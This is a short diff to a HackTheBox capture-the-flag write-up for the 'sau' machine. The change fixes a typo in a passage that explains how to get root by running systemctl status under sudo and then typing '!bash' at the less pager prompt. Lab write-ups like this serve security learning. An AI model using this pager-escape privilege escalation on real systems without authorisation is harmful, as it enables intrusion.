Disturbante/HTB-writeups/sau.md

 so we can use a classical less privesc (the script is runned as root with no password):

 	sudo /usr/bin/systemctl status trail.service
-(inside the interactiv less prompt we need to write):
+(inside the interactive less prompt we need to write):

 	!bash
 WE ARE NOW ROOT!!